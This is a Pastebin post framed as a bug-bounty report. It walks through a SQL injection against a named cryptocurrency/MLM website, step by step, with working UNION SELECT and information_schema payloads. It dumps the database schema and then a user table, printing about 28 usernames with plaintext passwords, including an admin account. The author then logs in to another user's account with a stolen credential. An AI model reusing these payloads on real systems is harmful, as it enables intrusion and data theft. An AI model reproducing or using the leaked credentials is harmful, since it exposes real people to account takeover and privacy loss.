Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * bounty reward website https://amorcoin.io *
- bug is on page event-details.php?event=8 there is a gap to execute the database via sql command.
- following step.
- *vuln test with a sign (*)
- this is the inject point.
- this link :
- https://amorcoin.io/event-details.php?event=8%27
- if vuln there will be an error in the page
- this a proof :
- https://prnt.sc/kwh41d
- *continue by calling the sql command with an order by.
- this link :
- https://amorcoin.io/event-details.php?event=8' order by+7-- -+
- order by di is already known up to 7.
- this a proof :
- https://prnt.sc/kwh7mq
- *further with the (union by select) command this command calls the database and reads the contents of the database.
- link :
- https://amorcoin.io/event-details.php?event=-8%27%20union%20all%20select+1,2,3,4,5,6,7--%20-+
- this a proof :
- https://prnt.sc/kwh66j
- above looks beautiful number (3) this number that we will execute
- *we continue by dismantling the database and searching for a username and password
- dump link get name database:
- https://amorcoin.io/event-details.php?event=-8' union all select+1,2,database(),4,5,6,7-- -+
- found : amorcoin_acoin
- this a proof :
- https://prnt.sc/kwh7di
- dump link get name table :
- https://amorcoin.io/event-details.php?event=-8' union all select+1,2,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x),4,5,6,7-- -+
- found :
- 0001: admin_sub
- 0002: blockchain_trans_history
- 0003: bvs_history
- 0004: coin_transactions
- 0005: coin_transactions_history
- 0006: coingate_transactions
- 0007: countries
- 0008: mlm_address
- 0009: mlm_admin
- 0010: mlm_autopricing
- 0011: mlm_banner
- 0012: mlm_binary
- 0013: mlm_binaryplan
- 0014: mlm_city
- 0015: mlm_cms
- 0016: mlm_country
- 0017: mlm_document
- 0018: mlm_events
- 0019: mlm_faq
- 0020: mlm_feedback
- 0021: mlm_generalsetting
- 0022: mlm_help
- 0023: mlm_language
- 0024: mlm_lending
- 0025: mlm_lendinghistory
- 0026: mlm_lendingpayout
- 0027: mlm_membership
- 0028: mlm_news
- 0029: mlm_newsletter
- 0030: mlm_outbox
- 0031: mlm_pages
- 0032: mlm_payoutcalc
- 0033: mlm_prewords
- 0034: mlm_price
- 0035: mlm_products
- 0036: mlm_promotionoffer
- 0037: mlm_purchase
- 0038: mlm_quit
- 0039: mlm_rank
- 0040: mlm_re_purchase
- 0041: mlm_redeem
- 0042: mlm_reg_count
- 0043: mlm_regcount
- 0044: mlm_register
- 0045: mlm_reward
- 0046: mlm_slider
- 0047: mlm_stake
- 0048: mlm_stakehistory
- 0049: mlm_stakepayout
- 0050: mlm_state
- 0051: mlm_stocks
- 0052: mlm_sunplan
- 0053: mlm_testimonial
- 0054: mlm_transwords
- 0055: mlm_transwords_old
- 0056: mlm_user_status
- 0057: mlm_walletcoin
- 0058: mlm_walletusd
- 0059: mlm_wastage
- 0060: mlm_widthdrawcoin
- 0061: mlm_withdrawrequsets
- 0062: mlmcms
- 0063: package
- 0064: package_entry
- 0065: split_partition
- 0066: syn_history
- 0067: unlock_request
- this a proof :
- https://prnt.sc/kwh8r3
- *and now we try to see the "mlm register" column to find out the username and password
- dump link :
- https://amorcoin.io/event-details.php?event=-8' union all select+1,2,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.COLUMNS)WHERE(TABLE_NAME=0x6d6c6d5f7265676973746572)AND(0x00)IN(@x:=concat(@x,CONCAT(LPAD(@NR:=@NR%2b1,2,0x30),0x3a20,column_name,0x3c62723e)))))x),4,5,6,7-- -+
- found :
- 11: username
- 12: user_fname
- 13: user_lname
- 14: user_password
- this a proof :
- https://prnt.sc/kwhawi
- dump link :
- https://amorcoin.io/event-details.php?event=-8' union all select+1,2,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(amorcoin_acoin.mlm_register)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x3a,user_password,0x3c62723e))))x),4,5,6,7-- -+
- found :
- Amoradmin:JasonLee090282
- siewtai:123456
- sophiaooi:abcd1234
- Susan:lam123466
- kentchan:bkyeoh51
- choi wei hoe:831109055265
- Christ Goh:123456
- Maxwell222:123456
- stanleyteoh:teoh5641
- kennychp:kennychp097173
- gohwah:abc3710332
- lyvender:123456
- clementx7:123456
- peiling:123456
- alice2288:123456
- yokechoy65:123456
- felicia8:felicia5542
- sengkim8:felicia5542
- ping5604:123456
- ee96ee:707290
- amy3986:707290
- KU1752:Qiuweiqi@1752
- gohzz:gzz780920
- eyh1973:eyh730116
- kawkin:123456
- cellywong:123456
- lbyeoh60:123456
- lhchew64:123456
- this a proof :
- https://prnt.sc/kwhan2
- *now we try to login
- link :
- https://amorcoin.io/login.php
- account :
- username : ee96ee
- password : 707290
- work... im sucses login..
- link :
- https://amorcoin.io/profile.php?succ
- this a proof :
- https://prnt.sc/kwhc3y
- * thanks alot
Add Comment
Please, Sign In to add comment